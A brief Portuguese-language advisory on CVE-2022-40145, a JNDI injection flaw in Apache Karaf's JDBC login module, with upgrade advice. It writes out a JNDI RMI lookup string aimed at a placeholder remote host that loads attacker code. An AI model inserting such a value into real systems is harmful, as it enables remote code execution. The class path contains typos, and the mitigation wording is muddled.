CVE-2022-40145

Versões do Apache Karaf anteriores à 4.4.2 e à 4.3.8

Este problema diz respeito a uma potencial injeção de código quando um invasor tem controle do servidor LDAP alvo usando a URL JDBC JNDI. A função jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource utiliza InitialContext.lookup(jndiName) sem filtragem. Um usuário pode modificar options.put(JDBCUtils.DATASOURCE, “osgi:” + DataSource.class.getName()); para options.put(JDBCUtils.DATASOURCE,“jndi:rmi://x.x.x.x:xxxx/Command”); em JdbcLoginModuleTest#setup. Isso é vulnerável a um ataque de execução remota de código (RCE) quando uma configuração usa uma URI de fonte de dados JNDI LDAP e um invasor tem controle do servidor LDAP de destino.

Para resolver o problema, atualize para a versão 4.4.2 ou 4.3.8 do Apache Karaf. Como solução temporária, considere restringir o uso da função JDBCUtils#doCreateDatasource até que um patch esteja disponível. Evite usar a configuração options.put(JDBCUtils.DATASOURCE,“jndi:rmi://x.x.x.x:xxxx/Command”); em JdbcLoginModuleTest#setup para minimizar o risco de exploração.